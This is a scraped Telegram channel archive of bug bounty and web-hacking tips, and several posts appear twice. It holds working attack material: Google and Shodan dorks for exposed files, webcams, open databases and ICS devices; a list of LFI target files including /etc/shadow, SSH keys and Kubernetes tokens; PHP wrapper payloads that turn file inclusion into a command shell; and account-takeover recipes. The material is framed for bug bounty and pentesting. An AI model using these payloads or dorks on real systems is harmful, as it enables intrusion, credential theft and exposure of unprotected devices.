ch
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

前往频道在 Telegram
7 429
订阅者
+424 小时
+207
+16430
帖子存档
🚀 Google Dorks for Bug Bounty & Web Security! 🔍 A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯 🔥 Broad Domain Search (Exclude Common Subdomains)
site:example.com -www -shop -share -ir -mfa
🔥 PHP Files with Parameters
site:example.com ext:php inurl:?
🔥 API Endpoints Discovery
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
🔥 Juicy Extensions (Sensitive Files)
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
🔥 High-Value InURL Keywords
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
🔥 Finding Server Errors
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
💥 Master these dorks to find misconfigurations, sensitive data leaks, and security flaws! 📢 #BugBounty #GoogleDorks #OSINT #EthicalHacking #Pentesting #CyberSecurity

A Comprehensive Repo for Shodan Dorks This GitHub repository provides a range of Shodan dorks to find vulnerabilities and configuration issues in various types of devices such as webcams, routers, and servers. • Repository: https://github.com/nullfuzz-pentest/shodan-dorks #infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork

Grep tips for Javascript Analysis
💡Note: cat * is for all files from the folder.
🟣Extracting JavaScript Files from recursive Directories
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
🟣Searching for API Keys and Secrets
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
🟣Detecting Dangerous Function Calls
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
🟣Checking for URL Manipulation
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
🟣Searching for Cross-Origin Requests
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
🟣Analyzing postMessage Usage
cat * | grep -r "postMessage"
🟣Finding Hardcoded URLs or Endpoints
cat * | grep -rE "https?://|www\."
🟣Locating Debugging Information
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
🟣Investigating User Input Handling
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS

🔐💻 دنیای امنیت، تاریکی‌ای که باید شناخت… اینجا جاییه که مرز بین نفوذ و محافظت، فقط چند خط کده... جایی که هر باگ، می‌تونه دروازه‌ای باشه برای دسترسی کامل به یک سیستم. ما اینجاییم تا این دروازه‌ها رو بشناسیم، بررسی کنیم، و اگه لازم شد… ازشون عبور کنیم. خانواده ما: https://t.me/cybr_hant

https://t.me/cybr_hant اونی که میخواستم هم نمیومد خب یه توضیح بده من فقط تبادل تایمی رفتم

ViperNull 🕷 با ما همیشه یک قدم جلوتر از تهدیدات باشید -تحلیل تخصصی تهدیدات و حملات -کتاب، ویدیو، پادکست و منابع کاربردی -تمرکز بر امنیت تدافعی و آشنایی با ابزارهای حرفه‌ای  مباحث blue team و red team و network همین حالا عضو شو: https://t.me/ViperNull 

photo content

🚀 LFI - Interesting Linux files /etc/issue /etc/passwd /etc/shadow /etc/group /etc/hosts /etc/motd /etc/mysql/my.cnf /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) /proc/self/environ /proc/version /proc/cmdline /proc/sched_debug /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/self/cwd/index.php /proc/self/cwd/main.py /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /run/secrets/kubernetes.io/serviceaccount/token /run/secrets/kubernetes.io/serviceaccount/namespace /run/secrets/kubernetes.io/serviceaccount/certificate /var/run/secrets/kubernetes.io/serviceaccount /var/lib/mlocate/mlocate.db /var/lib/plocate/plocate.db /var/lib/mlocate.db #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp

🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE ⚠️Most hackers stop at reading logs. The elite use PHP wrappers to turn LFI into remote code execution. This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇 🎯 Why PHP Wrappers Matter in Bug Bounty
PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.
As attackers, we can abuse these wrappers to: ✅ Read raw PHP source (even when .php is auto-appended) ✅ Bypass execution to leak secrets ✅ Chain into full RCE ✅ Abuse legacy or misconfigured server behavior Commonly used wrappers: ▶️ php://filter ▶️ php://input ▶️ php://memory ▶️ data:// ▶️ expect:// ▶️ zip:// ▶️ phar:// 🧬 Using php://filter for Source Code Disclosure This is the most useful wrapper for LFI. Payload:
php://filter/read=convert.base64-encode/resource=index
Why it works: ✅ read=convert.base64-encode prevents execution of the PHP code ✅ Base64 output = raw, readable source Example:
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config
Decode result:
echo 'PD9waHAK...base64...' | base64 -d
Now you see source code, credentials, internal logic, API keys, etc. 🔧 Other Useful PHP Wrappers 1️⃣ php://input Reads raw POST data. Good for injecting code during file inclusions via POST.
<?php include('php://input'); ?>
Then POST:
POST /index.php
<?php system($_GET['cmd']); ?>
✅ Shell access via cmd parameter. 2️⃣ expect:// (if available) Allows direct execution of system commands.
include('expect://ls');
⚠️ Rare but deadly if enabled. 3️⃣ data:// Inline file input using base64 or plaintext. Example:
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');
🟡 Executes: system('whoami') 4️⃣ zip:// ✅ Targets ZIP files as file systems. ✅ Abuse via LFI to include malicious entries. Structure:
zip://path/to/archive.zip#file_inside.txt
Use this with file upload + LFI combo. 5️⃣ phar:// Deserializes metadata → use with Object Injection + LFI. Upload malicious PHAR:
phar://path/to/phar_file
If unserialize() is called on a phar wrapper, it can lead to RCE. 🔍 Fuzzing PHP Files Before Exploiting
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php
Watch for: 200 → exists and renders 403/302 → access denied, but still includable via LFI 📁 Standard Inclusion vs. Filtered Inclusion Including via:
?file=config
🟡 Executes file, no output if file has no HTML. Using filter:
?file=php://filter/read=convert.base64-encode/resource=config
🟡 Returns base64 source code. 🧪 Decode & Analyze the Source Code
echo 'base64-encoded-content' | base64 -d
Look for: ✅ $db_password, $admin_pass ✅ API endpoints ✅ Sensitive routes ✅ Hardcoded JWT secrets or keys 💣 Advanced Chaining → From LFI to RCE Read source via php://filter Find upload paths or SSRF endpoints Upload malicious phar:// file Trigger inclusion → RCE This chain has been used in real-world bounty reports. 🧱 Defense Tips for Developers: - Disable allow_url_include, allow_url_fopen - Avoid dynamic include($_GET['page']) - Use strict whitelists - Harden php.ini configs - Monitor suspicious access patterns 🧠 Daily hacking insights 🛠 Payloads & Tools 🐞 Real bug bounty techniques ⚔️ Hands-on exploitation walkthroughs 👍 Like this post if it helped 🔁 Share to boost your hacker circle 🔗 Github link : github.com/cybersecplayground... #lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground

I think I missed this! 💥 - A Comprehensive Repo for Shodan Dorks This GitHub repository provides a range of Shodan dorks to find vulnerabilities and configuration issues in various types of devices such as webcams, routers, and servers. • Repository: https://github.com/nullfuzz-pentest/shodan-dorks #infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork

Grep tips for Javascript Analysis
💡Note: cat * is for all files from the folder.
🟣Extracting JavaScript Files from recursive Directories
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
🟣Searching for API Keys and Secrets
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
🟣Detecting Dangerous Function Calls
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
🟣Checking for URL Manipulation
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
🟣Searching for Cross-Origin Requests
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
🟣Analyzing postMessage Usage
cat * | grep -r "postMessage"
🟣Finding Hardcoded URLs or Endpoints
cat * | grep -rE "https?://|www\."
🟣Locating Debugging Information
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
🟣Investigating User Input Handling
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS

Firing 8 Account Takeover Methods 🔴Unicode Normalization Issue 1. victim account: victim@gmail.com 2. create an account using Unicode | example: vićtim@gmail.com (here is ć is an Unicode character) ✍️ list of Unicode character: 🔗 Link
Note: check where verification doesn’t require
🔴Authorization Issue 1. change email of Account A and put email B 2. check confirmation mail in account B 3. open the confirmation mail from account C Taken over Account C 🔴Reusing Reset Token if target allows you to reuse the reset link then hunt for more reset link via gau ,wayback or urlscan.io 🔴Pre Account Takeover 1. signup using normal signup form as a hacker but hacker has no verification link. 2. then if victim signs up using oauth . 3. Verification bypass now attacker can login the victim account without verification link with the password he entered while registering. 🔴CORS Misconfiguration to Account Takeover 1. check api , any endpoint has access access token/session/secret/fingerprint 2. if yes check for CORS misconfiguration does it allow us to fetch data from target? 3. make a payload to fetch data and replace headers and boom 🔴CSRF to ATO If profile modification in cookie based authentication doesn’t generate any token 1. open Account A change & Put email that you own click save intercept the request and generate a csrf poc. 2. if fully cookie based auth then you dont have to modify anything send the CSRF file to victim. 3. if it requires UUID/UserID or unique token it becomes hard to do that but that doesn't mean it is secure , just start playing with target hint: password reset page helps many times for UUID/GUID and UserID 🔴Host Header Injection well in this case there are 4 ways do that. 1. click reset password change host header. 2. or change proxy header ex: X-Forwarded-For: attacker.com 3. or change host, referrer, origin headers at once as attacker.com 4. click reset then click resend mail and do all 3 methods above 🔴Response Manipulation 1. code manipulation * to 200 OK 2. code and body manipulation code * to 200 OK body * to {"success":true} or {}
It works when json is being used to transfer and receive data.
#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #ATO

Shodan Dorks for OSINT, Recon and Bug Bounty 📸 Exposed Webcams
Finds IP cams running webcamXP software
• Example: http.title:"webcamXP" 🧑‍💻 Open FTP Servers
Finds FTP servers that allow anonymous login
• Example (Anonymous login access): port:21 anonymous 💻 Outdated Operation Systems
Like Finding devices that running Windows 7
• Example: os:"Windows 7" 🌐 Misconfigured MongoDB Databases
Finds exposed MongoDB instances without authentication
• Example: product:"MongoDB" port:27017 🔐 Exposed Login Panels
Identifies admin login portals
• Example: http.title:"Admin Login" 🧭 Specific Geolocation Targets
Finds services exposed in a specific country
• Example: port:22 country:"IN" 🧨 Apache Servers with Expired SSL in the US
Finds Apache web servers with expired SSL certs in the US
• Example: product:"Apache httpd" ssl:"expired" country:"US" 🧪 Devices Vulnerable to CVEs (e.g., Confluence CVE-2021–26084)
Finds potentially vulnerable Confluence servers
• Example: http.html:"Atlassian Confluence" port:8090 🎛 ICS/SCADA Devices
Detects Modbus protocol on industrial systems
• Example: port:502 name:"modbus" Subdomain Enumeration with Favicon using Shodan: Shodan Search Query Fundamentals: #infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork

If you come across a WordPress website, fuzz for these files and patterns:
.env.bak
.env.php
wp-config-backup.php
wp-config.php.save
wp-config.php~
wp-config.php.old
error_log.log
php_error.log
wp.sql
db.sql
wpbackup.sql
mysql_backup.sql
{TARGET}.zip
{TARGET}-backup.zip
You can generate wordlists with the patterns above or any pattern you want using Fback: https://github.com/Spix0r/Fback #InfoSec #CyberSecurity #Hacking #Course #bugbounty #wordpress #Fuzzing

List of the most useful curl commands! 🎯 Most Useful curl Commands for Downloading and Interacting with URLs (With Emoji for Better Understanding) # 1️⃣ Basic GET Request Use curl to fetch the content of a URL.
curl https://example.com
# 2️⃣ Save to a File Use -o to save the downloaded content to a file.
curl -o filename.html https://example.com
# 3️⃣ Display Response Headers Use -I to only fetch the response headers.
curl -I https://example.com
# 4️⃣ Follow Redirects Use -L to follow redirects (if the URL redirects you).
curl -L https://example.com
# 5️⃣ Download a File (with Resume) Use -C to resume a partially downloaded file.
curl -C - -O https://example.com/largefile.zip
# 6️⃣ Show Progress Use -# to show a progress bar during download.
curl -# -O https://example.com/largefile.zip
# 7️⃣ Download a Torrent Use -o to download and save a .torrent file.
curl -o ubuntu-22.04.iso.torrent https://releases.ubuntu.com/22.04/ubuntu-22.04.5-live-server-amd64.iso.torrent
# 8️⃣ Send a POST Request Use -X POST to send data to a server (e.g., form submission).
curl -X POST -d "username=user&password=pass" https://example.com/login
# 9️⃣ Include Custom Headers Use -H to add custom headers to your request.
curl -H "Authorization: Bearer TOKEN" https://api.example.com/data
# 🔟 Make a PUT Request Use -X PUT to send data to update a resource.
curl -X PUT -d '{"name": "John"}' -H "Content-Type: application/json" https://example.com/update
# 🔒 Send Data with Authentication Use -u to pass authentication credentials.
curl -u username:password https://example.com
# 1️⃣1️⃣ Save Cookies Use -c to save cookies to a file.
curl -c cookies.txt https://example.com
# 1️⃣2️⃣ Use Cookies from a File Use -b to send cookies from a saved file.
curl -b cookies.txt https://example.com
# 1️⃣3️⃣ Limit Download Speed Use --limit-rate to limit download speed.
curl --limit-rate 100K -O https://example.com/largefile.zip
# 1️⃣4️⃣ Show Full Request & Response Use -v for verbose output (request and response details).
curl -v https://example.com
# 1️⃣5️⃣ Send Data as JSON Use -H and -d to send data as JSON.
curl -X POST -H "Content-Type: application/json" -d '{"key": "value"}' https://example.com/api
# 1️⃣6️⃣ Access a URL with SSL Verification Disabled Use -k or --insecure to skip SSL certificate verification (not recommended for production).
curl -k https://example.com
# 1️⃣7️⃣ Limit Request Time Use --max-time to limit the total request time.
curl --max-time 10 https://example.com
# 1️⃣8️⃣ Download Multiple Files Use -O to download multiple files at once.
curl -O https://example.com/file1.zip -O https://example.com/file2.zip
# 1️⃣9️⃣ Get Information About the URL Use -I to fetch only headers for a URL.
curl -I https://example.com
# 2️⃣0️⃣ Use a Proxy Use -x to route your request through a proxy.
curl -x proxy.example.com:8080 https://example.com

🚀 Google Dorks for Bug Bounty & Web Security! 🔍 A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯 🔥 Broad Domain Search (Exclude Common Subdomains)
site:example.com -www -shop -share -ir -mfa
🔥 PHP Files with Parameters
site:example.com ext:php inurl:?
🔥 API Endpoints Discovery
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
🔥 Juicy Extensions (Sensitive Files)
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json
🔥 High-Value InURL Keywords
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
🔥 Finding Server Errors
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
💥 Master these dorks to find misconfigurations, sensitive data leaks, and security flaws! 📢 #BugBounty #GoogleDorks #OSINT #EthicalHacking #Pentesting #CyberSecurity